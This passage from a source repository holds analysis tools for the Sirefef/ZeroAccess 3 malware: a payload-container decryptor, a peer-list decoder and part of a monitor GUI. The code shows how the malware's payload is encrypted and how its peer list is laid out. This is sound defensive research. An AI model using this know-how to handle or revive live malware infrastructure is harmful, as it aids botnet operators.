"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: MAIN.C\n*\n* VERSION: 1.02\n*\n* DATE: 01 Dec 2017\n*\n* Shigure program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma comment(lib, \"bcrypt.lib\")\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n#include \"..\\shared\\cab.h\"\n\n#include \n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFDECRYPTTITLE L\"Sirefef/ZeroAccess 3 decryptor v1.0 (10/01/16)\"\n#define T_SFDECRYPTUSAGE L\"Usage: zadecrypt inputfile [outputfile]\\n\\r\\te.g. zadecrypt in.dll out.bin\\r\\n\"\n#define T_SFDECRYPTED L\"File decrypted \"\n#define T_SFDECRYPTFAIL L\"\\r\\nError while decrypting file\"\n#define T_SFPRESSANYKEY L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfDecryptPayload\n*\n* Purpose:\n*\n* Decrypt container from resource using as hash md5 from file header bytes.\n*\n* CNG variant\n*\n*/\nUINT SfDecryptPayload(\n LPWSTR lpParameter\n)\n{\n BOOL cond = FALSE, bSuccess = FALSE;\n PBYTE cng_object, hashdata, decrypted, enc_data, extracted;\n ULONG obj_sz, rlen, hdatasz, enc_data_size;\n BCRYPT_ALG_HANDLE h_alg = NULL;\n BCRYPT_HASH_HANDLE h_hash = NULL;\n BCRYPT_KEY_HANDLE h_rc4key = NULL;\n NTSTATUS status;\n HANDLE pheap = NULL;\n PIMAGE_FILE_HEADER fheader;\n PVOID pdll = NULL;\n WCHAR InputFile[MAX_PATH + 1], OutputFile[MAX_PATH + 1];\n\n rlen = 0;\n RtlSecureZeroMemory(InputFile, sizeof(InputFile));\n GetCommandLineParam(lpParameter, 1, InputFile, MAX_PATH, &rlen);\n if (rlen == 0) {\n SfcuiPrintText(g_ConOut,\n T_SFDECRYPTUSAGE,\n g_ConsoleOutput, FALSE);\n return (UINT)-1;\n }\n\n do {\n\n rlen = 0;\n GetCommandLineParam(lpParameter, 2, OutputFile, MAX_PATH, &rlen);\n\n if (rlen == 0)\n _strcpy(OutputFile, TEXT(\"out.bin\"));\n\n pdll = SfuCreateFileMappingNoExec(InputFile);\n if (pdll == NULL)\n break;\n\n enc_data_size = 0;\n enc_data = SfLdrQueryResourceData(2, pdll, &enc_data_size);\n if (enc_data == NULL)\n break;\n\n fheader = &(RtlImageNtHeader(pdll)->FileHeader);\n\n status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_MD5_ALGORITHM, NULL, 0);\n if (!NT_SUCCESS(status))\n break;\n obj_sz = 0;\n rlen = 0;\n status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);\n if (!NT_SUCCESS(status))\n break;\n\n hdatasz = 0;\n rlen = 0;\n status = BCryptGetProperty(h_alg, BCRYPT_HASH_LENGTH, (PUCHAR)&hdatasz, sizeof(hdatasz), &rlen, 0);\n if (!NT_SUCCESS(status))\n break;\n\n pheap = HeapCreate(0, 0, 0);\n if (pheap == NULL)\n break;\n\n cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);\n if (cng_object == NULL)\n break;\n\n hashdata = HeapAlloc(pheap, HEAP_ZERO_MEMORY, hdatasz);\n if (hashdata == NULL)\n break;\n\n status = BCryptCreateHash(h_alg, &h_hash, cng_object, obj_sz, NULL, 0, 0);\n if (!NT_SUCCESS(status))\n break;\n\n status = BCryptHashData(h_hash, (PUCHAR)fheader, sizeof(IMAGE_FILE_HEADER), 0);\n if (!NT_SUCCESS(status))\n break;\n\n status = BCryptFinishHash(h_hash, hashdata, hdatasz, 0);\n if (!NT_SUCCESS(status))\n break;\n\n BCryptDestroyHash(h_hash);\n BCryptCloseAlgorithmProvider(h_alg, 0);\n HeapFree(pheap, 0, cng_object);\n h_alg = NULL;\n h_hash = NULL;\n\n status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_RC4_ALGORITHM, NULL, 0);\n if (!NT_SUCCESS(status))\n break;\n\n obj_sz = 0;\n rlen = 0;\n status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);\n if (!NT_SUCCESS(status))\n break;\n\n cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);\n if (cng_object == NULL)\n break;\n\n status = BCryptGenerateSymmetricKey(h_alg, &h_rc4key, cng_object, obj_sz, hashdata, hdatasz, 0);\n if (!NT_SUCCESS(status))\n break;\n\n decrypted = HeapAlloc(pheap, HEAP_ZERO_MEMORY, enc_data_size);\n if (decrypted == NULL)\n break;\n\n rlen = 0;\n status = BCryptEncrypt(h_rc4key, enc_data, enc_data_size, NULL, NULL, 0, decrypted, enc_data_size, &rlen, 0);\n if (!NT_SUCCESS(status))\n break;\n\n bSuccess = FALSE;\n enc_data_size = rlen;\n rlen = 0;\n extracted = SfcabExtractMemory(decrypted, enc_data_size, &rlen);\n if (extracted) {\n\n if (SfuWriteBufferToFile(OutputFile, extracted, rlen, FALSE, FALSE) == rlen) {\n bSuccess = TRUE;\n }\n LocalFree(extracted);\n }\n else {\n //failed to extract, drop cab as is\n if (SfuWriteBufferToFile(OutputFile, decrypted, enc_data_size, FALSE, FALSE) == enc_data_size) {\n bSuccess = TRUE;\n }\n }\n\n if (bSuccess) {\n\n SfcuiPrintText(g_ConOut,\n T_SFDECRYPTED,\n g_ConsoleOutput, FALSE);\n\n SfcuiPrintText(g_ConOut,\n OutputFile,\n g_ConsoleOutput, FALSE);\n }\n\n } while (cond);\n\n if (bSuccess == FALSE) {\n\n SfcuiPrintText(g_ConOut,\n T_SFDECRYPTFAIL,\n g_ConsoleOutput, FALSE);\n\n }\n\n if (h_rc4key != NULL)\n BCryptDestroyKey(h_rc4key);\n\n if (h_hash != NULL)\n BCryptDestroyHash(h_hash);\n\n if (h_alg != NULL)\n BCryptCloseAlgorithmProvider(h_alg, 0);\n\n if (pheap != NULL)\n HeapDestroy(pheap);\n\n if (pdll != 0)\n NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pdll);\n\n return 0;\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Shigure main.\n*\n*/\nvoid SfMain(\n VOID\n)\n{\n BOOL cond = FALSE;\n UINT uResult = 0;\n DWORD dwTemp;\n HANDLE StdIn;\n INPUT_RECORD inp1;\n\n __security_init_cookie();\n\n do {\n\n g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n if (g_ConOut == INVALID_HANDLE_VALUE) {\n uResult = (UINT)-1;\n break;\n }\n\n g_ConsoleOutput = TRUE;\n if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n g_ConsoleOutput = FALSE;\n }\n\n SetConsoleTitle(T_SFDECRYPTTITLE);\n SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n if (g_ConsoleOutput == FALSE) {\n WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n }\n\n uResult = SfDecryptPayload(GetCommandLine());\n\n if (g_ConsoleOutput) {\n\n SfcuiPrintText(g_ConOut,\n T_SFPRESSANYKEY,\n TRUE, FALSE);\n\n StdIn = GetStdHandle(STD_INPUT_HANDLE);\n if (StdIn != INVALID_HANDLE_VALUE) {\n RtlSecureZeroMemory(&inp1, sizeof(inp1));\n ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n }\n }\n\n } while (cond);\n\n ExitProcess(uResult);\n}\n"
},
{
"path": "Source/Shigure/resource.h",
"content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE 101\n#define _APS_NEXT_COMMAND_VALUE 40001\n#define _APS_NEXT_CONTROL_VALUE 1001\n#define _APS_NEXT_SYMED_VALUE 101\n#endif\n#endif\n"
},
{
"path": "Source/Umikaze/Umikaze.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n {06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}\n Win32Proj\n Umikaze\n 8.1\n \n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n zadecode32\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n zadecode64\n \n \n \n \n \n Level3\n Disabled\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n SfMain\n \n \n \n \n \n \n Level3\n Disabled\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n SfMain\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n Guard\n \n \n Console\n true\n true\n No\n SfMain\n true\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n Guard\n \n \n Console\n true\n true\n No\n SfMain\n true\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Umikaze/Umikaze.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {5e475bb5-a4f5-471e-b3c8-d87ad53517d2}\n \n \n {4b54bbae-5cb8-4e4d-8558-c08ddc6ea92b}\n \n \n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n Header Files\n \n \n shared\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Umikaze/Umikaze.vcxproj.user",
"content": "\n\n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Umikaze/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: MAIN.C\n*\n* VERSION: 1.02\n*\n* DATE: 01 Dec 2017\n*\n* Umikaze program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFDECODETITLE L\"Sirefef/ZeroAccess 3 peer list decoder v1.0 (10/01/16)\"\n#define T_SFDECODEUSAGE L\"Usage: zadecode peerlist_filename [type 32 or 64, default 32]\\n\\r\\te.g. zadecode s32 32\\r\\n\"\n#define T_SFDECODEMODE L\"Wrong mode, possible values 32 or 64\\r\\n\"\n#define T_SFUNSUCCESSF L\"Error generating list\"\n#define T_SFBADDATA L\"File has wrong structure or damaged\"\n#define T_SFGENERATED L\"File generated \"\n#define T_SFPRESSANYKEY L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfDecodePeerList\n*\n* Purpose:\n*\n* Decode peer list to file, ZA v3 variant.\n*\n*/\nNTSTATUS SfDecodePeerList(\n LPWSTR lpInFileName,\n LPWSTR lpOutFileName,\n ULONG uType\n)\n{\n BOOL cond = FALSE;\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n HANDLE hFile = NULL;\n OBJECT_ATTRIBUTES obja;\n IO_STATUS_BLOCK iost;\n UNICODE_STRING NtFileName;\n FILE_STANDARD_INFORMATION fsi;\n PUCHAR FileBuffer = NULL;\n\n ULONG i, j, c, Port, bytesIO;\n PZA_PEERINFO peer;\n LARGE_INTEGER ftime;\n SYSTEMTIME st1;\n WCHAR text[MAX_PATH + 1];\n\n RtlSecureZeroMemory(&NtFileName, sizeof(NtFileName));\n\n do {\n //open input file\n if (RtlDosPathNameToNtPathName_U(lpInFileName, &NtFileName, NULL, NULL) == FALSE)\n break;\n\n InitializeObjectAttributes(&obja, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);\n status = NtCreateFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE, &obja, &iost, NULL, 0,\n FILE_SHARE_READ, FILE_OPEN,\n FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n if (!NT_SUCCESS(status))\n break;\n\n //get file size\n status = NtQueryInformationFile(hFile, &iost, &fsi,\n sizeof(FILE_STANDARD_INFORMATION),\n FileStandardInformation);\n if (!NT_SUCCESS(status))\n break;\n\n c = fsi.EndOfFile.LowPart % sizeof(ZA_PEERINFO);\n if (c != 0) {\n status = STATUS_BAD_DATA;\n break;\n }\n\n FileBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, fsi.EndOfFile.LowPart);\n if (FileBuffer == NULL)\n break;\n\n //read file to buffer\n status = NtReadFile(hFile, NULL, NULL, NULL, &iost, FileBuffer, fsi.EndOfFile.LowPart, NULL, NULL);\n if (!NT_SUCCESS(status))\n break;\n\n //close input file\n NtClose(hFile);\n hFile = NULL;\n RtlFreeUnicodeString(&NtFileName);\n\n //create output file\n if (RtlDosPathNameToNtPathName_U(lpOutFileName, &NtFileName, NULL, NULL) == FALSE)\n break;\n\n InitializeObjectAttributes(&obja, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);\n status = NtCreateFile(&hFile, FILE_WRITE_ACCESS | SYNCHRONIZE, &obja, &iost, NULL, 0,\n 0, FILE_OVERWRITE_IF,\n FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);\n if (!NT_SUCCESS(status))\n break;\n\n NtWriteFile(hFile, NULL, NULL, NULL, &iost, &g_BE, sizeof(g_BE), NULL, NULL);\n\n c = fsi.EndOfFile.LowPart / sizeof(ZA_PEERINFO);\n for (i = 0, j = 0; i < c; i += 1, j += sizeof(ZA_PEERINFO)) {\n\n peer = (ZA_PEERINFO *)&FileBuffer[j];\n\n RtlSecureZeroMemory(&text, sizeof(text));\n RtlIpv4AddressToStringW((struct in_addr*)&peer->IP, (PWSTR)&text);\n\n _strcat(text, TEXT(\":\"));\n\n Port = 0x4000 + (peer->Port);\n if (uType == 64) Port += 0x4000;\n ultostr(Port, _strend(text));\n _strcat(text, TEXT(\" \"));\n\n RtlSecondsSince1980ToTime((peer->TimeStamp * 3600) - 0xbf000000, &ftime);\n RtlSecureZeroMemory(&st1, sizeof(st1));\n if (FileTimeToSystemTime((PFILETIME)&ftime, &st1)) {\n ultostr(st1.wDay, _strend(text));\n _strcat(text, TEXT(\"/\"));\n ultostr(st1.wMonth, _strend(text));\n _strcat(text, TEXT(\"/\"));\n ultostr(st1.wYear, _strend(text));\n _strcat(text, TEXT(\" \"));\n ultostr(st1.wHour, _strend(text));\n _strcat(text, TEXT(\":\"));\n ultostr(st1.wMinute, _strend(text));\n _strcat(text, TEXT(\":\"));\n ultostr(st1.wSecond, _strend(text));\n }\n _strcat(text, TEXT(\"\\r\\n\"));\n\n bytesIO = (ULONG)(_strlen(text) * sizeof(WCHAR));\n status = NtWriteFile(hFile,\n NULL,\n NULL,\n NULL,\n &iost,\n text,\n bytesIO,\n NULL,\n NULL);\n }\n\n } while (cond);\n\n if (hFile) NtClose(hFile);\n if (FileBuffer) RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, FileBuffer);\n if (NtFileName.Buffer) RtlFreeUnicodeString(&NtFileName);\n\n return status;\n}\n\n/*\n* SfProcessCmdLine\n*\n* Purpose:\n*\n* Parse command line and do the job.\n*\n*/\nUINT SfProcessCmdLine(\n LPWSTR lpCommandLine\n)\n{\n NTSTATUS status;\n ULONG rlen, uType = 32;\n WCHAR textbuf[MAX_PATH + 1], textbuf2[MAX_PATH * 2];\n WCHAR szMode[MAX_PATH + 1];\n\n //path\n rlen = 0;\n RtlSecureZeroMemory(&textbuf, sizeof(textbuf));\n GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&textbuf, sizeof(textbuf), &rlen);\n if (rlen == 0) {\n\n SfcuiPrintText(g_ConOut,\n T_SFDECODEUSAGE,\n g_ConsoleOutput, FALSE);\n\n return (UINT)-1;\n }\n\n //type\n rlen = 0;\n RtlSecureZeroMemory(&szMode, sizeof(szMode));\n GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szMode, sizeof(szMode), &rlen);\n if (rlen == 0) {\n uType = 32;\n }\n else {\n uType = strtoul(szMode);\n if (uType != 32 && uType != 64) {\n\n SfcuiPrintText(g_ConOut,\n T_SFDECODEMODE,\n g_ConsoleOutput, FALSE);\n\n return (UINT)-2;\n }\n }\n\n _strcpy(textbuf2, textbuf);\n\n if (uType == 32) {\n _strcat(textbuf2, L\".d32.txt\");\n }\n else {\n _strcat(textbuf2, L\".d64.txt\");\n }\n\n status = SfDecodePeerList(textbuf, textbuf2, uType);\n switch (status) {\n\n\n case STATUS_BAD_DATA:\n\n SfcuiPrintText(g_ConOut,\n T_SFBADDATA,\n g_ConsoleOutput, FALSE);\n\n return (UINT)-3;\n break;\n\n case STATUS_SUCCESS:\n\n SfcuiPrintText(g_ConOut,\n T_SFGENERATED,\n g_ConsoleOutput, FALSE);\n\n SfcuiPrintText(g_ConOut,\n textbuf2,\n g_ConsoleOutput, FALSE);\n\n break;\n\n default:\n SfcuiPrintText(g_ConOut,\n T_SFUNSUCCESSF,\n g_ConsoleOutput, FALSE);\n\n return (UINT)-4;\n break;\n }\n\n return 0;\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Umikaze main.\n*\n*/\nvoid SfMain(\n VOID\n)\n{\n BOOL cond = FALSE;\n UINT uResult = 0;\n DWORD dwTemp;\n HANDLE StdIn;\n INPUT_RECORD inp1;\n\n __security_init_cookie();\n\n do {\n\n g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n if (g_ConOut == INVALID_HANDLE_VALUE) {\n uResult = (UINT)-1;\n break;\n }\n\n g_ConsoleOutput = TRUE;\n if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n g_ConsoleOutput = FALSE;\n }\n\n SetConsoleTitle(T_SFDECODETITLE);\n SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n if (g_ConsoleOutput == FALSE) {\n WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n }\n\n uResult = SfProcessCmdLine(GetCommandLine());\n\n if (g_ConsoleOutput) {\n\n SfcuiPrintText(g_ConOut,\n T_SFPRESSANYKEY,\n TRUE, FALSE);\n\n StdIn = GetStdHandle(STD_INPUT_HANDLE);\n if (StdIn != INVALID_HANDLE_VALUE) {\n RtlSecureZeroMemory(&inp1, sizeof(inp1));\n ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n }\n }\n\n } while (cond);\n\n ExitProcess(uResult);\n}\n"
},
{
"path": "Source/Umikaze/resource.h",
"content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE 101\n#define _APS_NEXT_COMMAND_VALUE 40001\n#define _APS_NEXT_CONTROL_VALUE 1001\n#define _APS_NEXT_SYMED_VALUE 101\n#endif\n#endif\n"
},
{
"path": "Source/Yuudachi/Yuudachi.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n {14358883-8E74-44F5-BCC4-C32D41A3A662}\n Win32Proj\n Yuudachi\n 8.1\n \n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n zamon32\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n zamon64\n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n \n \n Windows\n true\n SfMain\n \n \n za.manifest\n \n \n true\n \n \n \n \n \n \n Level4\n Disabled\n _DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n \n \n Windows\n true\n SfMain\n \n \n za.manifest\n \n \n true\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n Guard\n MultiThreaded\n true\n true\n \n \n Windows\n true\n true\n No\n SfMain\n true\n \n \n za.manifest\n \n \n true\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n Guard\n MultiThreadedDLL\n true\n true\n \n \n Windows\n true\n true\n No\n SfMain\n true\n \n \n \n \n za.manifest\n \n \n true\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Yuudachi/Yuudachi.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {b28fb8f1-e665-449f-80f8-3eae4258df44}\n \n \n {43bb3fdd-e398-4c7f-b3df-b6c20917a390}\n \n \n \n \n Source Files\n \n \n Source Files\n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n \n \n Header Files\n \n \n Header Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Yuudachi/Yuudachi.vcxproj.user",
"content": "\n\n \n"
},
{
"path": "Source/Yuudachi/gui.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: GUI.C\n*\n* VERSION: 1.01\n*\n* DATE: 22 Jan 2016\n*\n* Yuudachi GUI support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#define OEMRESOURCE\n#include \"..\\shared\\global.h\"\n#include \"p2p.h\"\n#include \"gui.h\"\n\n#include \n#pragma comment(lib, \"ComCtl32.Lib\")\n\nstatic const WCHAR\tT_SFWNDTITLE[] = TEXT(\"ZeroAccess monitor\");\nstatic const WCHAR\tT_SFMAINWNDCLASS[] = TEXT(\"za root class\");\n\nZA_GUI_CONTEXT g_guictx;\n\n/*\n* SfUIAddEvent\n*\n* Purpose:\n*\n* Output event.\n*\n*/\nVOID SfUIAddEvent(\n\t_In_opt_ PVOID ScanContext,\n\t_In_ ULONG Event,\n\t_In_opt_ LPWSTR lpValue\n\t)\n{\n\tLVITEM lvitem;\n\tINT index;\n\tULONG n;\n\tLPWSTR lpEvent;\n\tWCHAR szBuffer[MAX_PATH];\n\tZA_SCANCTX *pCtx = (ZA_SCANCTX*)ScanContext;\n\n\tswitch (Event) {\n\n\tcase GUI_EVENT_ERROR:\n\t\tlpEvent = TEXT(\"Error\");\n\t\tbreak;\n\tcase GUI_EVENT_CONNECTION:\n\t\tlpEvent = TEXT(\"Connection\");\n\t\tbreak;\n\tcase GUI_EVENT_PACKET_RECV:\n\t\tlpEvent = TEXT(\"PacketReceived\");\n\t\tbreak;\n\tcase GUI_EVENT_PACKET_SEND:\n\t\tlpEvent = TEXT(\"PacketSend\");\n\t\tbreak;\n\tcase GUI_EVENT_DOWNLOAD_FILE:\n\t\tlpEvent = TEXT(\"FileDownload\");\n\t\tbreak;\n\tcase GUI_EVENT_FILE_HEADER:\n\t\tlpEvent = TEXT(\"FileHeader\");\n\t\tbreak;\n\tcase GUI_EVENT_PEER_HEADER:\n\t\tlpEvent = TEXT(\"PeerHeader\");\n\t\tbreak;\n\tcase GUI_EVENT_NEWROUND:\n\t\tlpEvent = TEXT(\"NewRound\");\n\t\tbreak;\n\tcase GUI_EVENT_PACKET_HEADER:\n\t\tlpEvent = TEXT(\"PacketHeader\");\n\t\tbreak;\n\tcase GUI_EVENT_INFORMATION:\n\t\tlpEvent = TEXT(\"Information\");\n\t\tbreak;\n\tcase GUI_EVENT_THREAD_STARTED:\n\tcase GUI_EVENT_THREAD_TERMINATED:\n\t\tlpEvent = TEXT(\"Thread\");\n\t\tbreak;\n\tdefault:\n\t\tlpEvent = TEXT(\"UnnamedEvent\");\n\t\tbreak;\n\t}\n\n\t//Event\n\tRtlSecureZeroMemory(&lvitem, sizeof(lvitem));\n\tlvitem.mask = LVIF_TEXT;\n\tlvitem.iSubItem = 0;\n\tlvitem.iItem = MAXINT;\n\tlvitem.iImage = 0;\n\tlvitem.pszText = lpEvent;\n\tindex = ListView_InsertItem(g_guictx.OutputWindow, &lvitem);\n\n\t//Value\n\tlvitem.mask = 